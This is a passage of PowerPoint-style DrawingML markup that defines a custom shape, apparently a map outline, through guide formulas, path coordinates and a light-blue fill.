                  <a:gd name="T9" fmla="*/ 207 h 224"/>
                  <a:gd name="T10" fmla="*/ 217 w 226"/>
                  <a:gd name="T11" fmla="*/ 197 h 224"/>
                  <a:gd name="T12" fmla="*/ 223 w 226"/>
                  <a:gd name="T13" fmla="*/ 195 h 224"/>
                  <a:gd name="T14" fmla="*/ 48 w 226"/>
                  <a:gd name="T15" fmla="*/ 181 h 224"/>
                  <a:gd name="T16" fmla="*/ 55 w 226"/>
                  <a:gd name="T17" fmla="*/ 153 h 224"/>
                  <a:gd name="T18" fmla="*/ 63 w 226"/>
                  <a:gd name="T19" fmla="*/ 142 h 224"/>
                  <a:gd name="T20" fmla="*/ 56 w 226"/>
                  <a:gd name="T21" fmla="*/ 127 h 224"/>
                  <a:gd name="T22" fmla="*/ 49 w 226"/>
                  <a:gd name="T23" fmla="*/ 112 h 224"/>
                  <a:gd name="T24" fmla="*/ 40 w 226"/>
                  <a:gd name="T25" fmla="*/ 95 h 224"/>
                  <a:gd name="T26" fmla="*/ 31 w 226"/>
                  <a:gd name="T27" fmla="*/ 88 h 224"/>
                  <a:gd name="T28" fmla="*/ 13 w 226"/>
                  <a:gd name="T29" fmla="*/ 78 h 224"/>
                  <a:gd name="T30" fmla="*/ 1 w 226"/>
                  <a:gd name="T31" fmla="*/ 74 h 224"/>
                  <a:gd name="T32" fmla="*/ 7 w 226"/>
                  <a:gd name="T33" fmla="*/ 66 h 224"/>
                  <a:gd name="T34" fmla="*/ 3 w 226"/>
                  <a:gd name="T35" fmla="*/ 63 h 224"/>
                  <a:gd name="T36" fmla="*/ 15 w 226"/>
                  <a:gd name="T37" fmla="*/ 59 h 224"/>
                  <a:gd name="T38" fmla="*/ 30 w 226"/>
                  <a:gd name="T39" fmla="*/ 59 h 224"/>
                  <a:gd name="T40" fmla="*/ 43 w 226"/>
                  <a:gd name="T41" fmla="*/ 60 h 224"/>
                  <a:gd name="T42" fmla="*/ 51 w 226"/>
                  <a:gd name="T43" fmla="*/ 57 h 224"/>
                  <a:gd name="T44" fmla="*/ 46 w 226"/>
                  <a:gd name="T45" fmla="*/ 39 h 224"/>
                  <a:gd name="T46" fmla="*/ 57 w 226"/>
                  <a:gd name="T47" fmla="*/ 44 h 224"/>
                  <a:gd name="T48" fmla="*/ 76 w 226"/>
                  <a:gd name="T49" fmla="*/ 44 h 224"/>
                  <a:gd name="T50" fmla="*/ 85 w 226"/>
                  <a:gd name="T51" fmla="*/ 32 h 224"/>
                  <a:gd name="T52" fmla="*/ 100 w 226"/>
                  <a:gd name="T53" fmla="*/ 13 h 224"/>
                  <a:gd name="T54" fmla="*/ 116 w 226"/>
                  <a:gd name="T55" fmla="*/ 0 h 224"/>
                  <a:gd name="T56" fmla="*/ 126 w 226"/>
                  <a:gd name="T57" fmla="*/ 7 h 224"/>
                  <a:gd name="T58" fmla="*/ 134 w 226"/>
                  <a:gd name="T59" fmla="*/ 19 h 224"/>
                  <a:gd name="T60" fmla="*/ 143 w 226"/>
                  <a:gd name="T61" fmla="*/ 26 h 224"/>
                  <a:gd name="T62" fmla="*/ 152 w 226"/>
                  <a:gd name="T63" fmla="*/ 25 h 224"/>
                  <a:gd name="T64" fmla="*/ 157 w 226"/>
                  <a:gd name="T65" fmla="*/ 33 h 224"/>
                  <a:gd name="T66" fmla="*/ 168 w 226"/>
                  <a:gd name="T67" fmla="*/ 40 h 224"/>
                  <a:gd name="T68" fmla="*/ 184 w 226"/>
                  <a:gd name="T69" fmla="*/ 48 h 224"/>
                  <a:gd name="T70" fmla="*/ 194 w 226"/>
                  <a:gd name="T71" fmla="*/ 47 h 224"/>
                  <a:gd name="T72" fmla="*/ 199 w 226"/>
                  <a:gd name="T73" fmla="*/ 61 h 224"/>
                  <a:gd name="T74" fmla="*/ 196 w 226"/>
                  <a:gd name="T75" fmla="*/ 75 h 224"/>
                  <a:gd name="T76" fmla="*/ 189 w 226"/>
                  <a:gd name="T77" fmla="*/ 87 h 224"/>
                  <a:gd name="T78" fmla="*/ 185 w 226"/>
                  <a:gd name="T79" fmla="*/ 92 h 224"/>
                  <a:gd name="T80" fmla="*/ 172 w 226"/>
                  <a:gd name="T81" fmla="*/ 108 h 224"/>
                  <a:gd name="T82" fmla="*/ 173 w 226"/>
                  <a:gd name="T83" fmla="*/ 119 h 224"/>
                  <a:gd name="T84" fmla="*/ 182 w 226"/>
                  <a:gd name="T85" fmla="*/ 127 h 224"/>
                  <a:gd name="T86" fmla="*/ 184 w 226"/>
                  <a:gd name="T87" fmla="*/ 141 h 224"/>
                  <a:gd name="T88" fmla="*/ 187 w 226"/>
                  <a:gd name="T89" fmla="*/ 151 h 224"/>
                  <a:gd name="T90" fmla="*/ 196 w 226"/>
                  <a:gd name="T91" fmla="*/ 162 h 224"/>
                  <a:gd name="T92" fmla="*/ 186 w 226"/>
                  <a:gd name="T93" fmla="*/ 179 h 224"/>
                  <a:gd name="T94" fmla="*/ 166 w 226"/>
                  <a:gd name="T95" fmla="*/ 188 h 224"/>
                  <a:gd name="T96" fmla="*/ 150 w 226"/>
                  <a:gd name="T97" fmla="*/ 182 h 224"/>
                  <a:gd name="T98" fmla="*/ 129 w 226"/>
                  <a:gd name="T99" fmla="*/ 185 h 224"/>
                  <a:gd name="T100" fmla="*/ 123 w 226"/>
                  <a:gd name="T101" fmla="*/ 202 h 224"/>
                  <a:gd name="T102" fmla="*/ 108 w 226"/>
                  <a:gd name="T103" fmla="*/ 204 h 224"/>
                  <a:gd name="T104" fmla="*/ 99 w 226"/>
                  <a:gd name="T105" fmla="*/ 202 h 224"/>
                  <a:gd name="T106" fmla="*/ 85 w 226"/>
                  <a:gd name="T107" fmla="*/ 194 h 224"/>
                  <a:gd name="T108" fmla="*/ 73 w 226"/>
                  <a:gd name="T109" fmla="*/ 196 h 224"/>
                  <a:gd name="T110" fmla="*/ 67 w 226"/>
                  <a:gd name="T111" fmla="*/ 194 h 224"/>
                  <a:gd name="T112" fmla="*/ 53 w 226"/>
                  <a:gd name="T113" fmla="*/ 189 h 224"/>
                  <a:gd name="T114" fmla="*/ 49 w 226"/>
                  <a:gd name="T115" fmla="*/ 185 h 224"/>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226"/>
                  <a:gd name="T175" fmla="*/ 0 h 224"/>
                  <a:gd name="T176" fmla="*/ 226 w 226"/>
                  <a:gd name="T177" fmla="*/ 224 h 224"/>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226" h="224">
                    <a:moveTo>
                      <a:pt x="225" y="189"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="225" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="217"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="189"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="46" y="182"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="48" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="159"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="182"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="193"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="182"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
